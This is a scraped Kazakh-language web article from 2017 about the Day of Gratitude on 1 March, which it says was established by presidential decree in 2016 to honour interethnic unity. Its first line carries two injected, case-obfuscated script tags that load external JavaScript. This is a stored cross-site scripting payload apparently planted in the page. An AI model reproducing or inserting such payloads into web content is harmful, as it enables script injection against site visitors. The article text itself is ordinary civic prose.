<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.03.2017

1 наурыз – Алғыс

айту күні

Қазақстан халқы 2016

жылы тұңғыш рет Алғыс айту күнін атап өтті. 2016 жылғы 14 қаңтарда Қазақстан

республикасының Президенті Н.Ә.Назарбаев Қазақстан халқы Ассамблеясының

құрылған күні 1 наурызды елімізде Алғыс айту күні деп жариялап, № 173 Жарлыққа

қол қойған болатын.

Алғыс айту күнін мерекелеудің жаңа дәстүрі «Мәңгілік

Ел» бірлігін ортақ тарих және тарихи сана негізінде нығайту мен дамытудың

мән-мәтінінде қазақстандық құндылықтарды бейнелейді.

Алғыс айту күні – ұл, ең алдымен

елімізде тыныштық пен үндестік, өзара сенімділік пен барлық қазақстандықтарға

деген құрметтің орнығуына негіз болған Президенттің бейбітшілік пен келісім

саясатының салтанаты күні. Бұл – тағдыр тәлкегімен Қазақстан жеріне еріксіз

қоныс аударған түрлі этностардың миллиондаған өкілдерінің құтты қонысына

айналған қасиетті қазақ жері мен қонақжай қазақ халқына терең тағзымның

белгісі. Қазақ халқы қиын-қыстау заманда олардың басына түскен ауыртпалықты

қайыспай бірге көтере білді, бұл бүгінгі таңда еліміздегі түрлі ұлт өкілдерінің

арасындағы адамгершілік қарым-қатынастың өнегелі өлшеміне айналды.

Алғыс айту күні –

күрделі заманда иық тіресе бірге еңсеріп, қысқа мерзім ішінде Елбасының

басшылығымен Тәуелсіз Қазақстанды құру жолында аянбай тер төккен еліміздің

барлық азаматттарының бір-біріне құрмет білдіретін күн.

Просмотров: 636

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу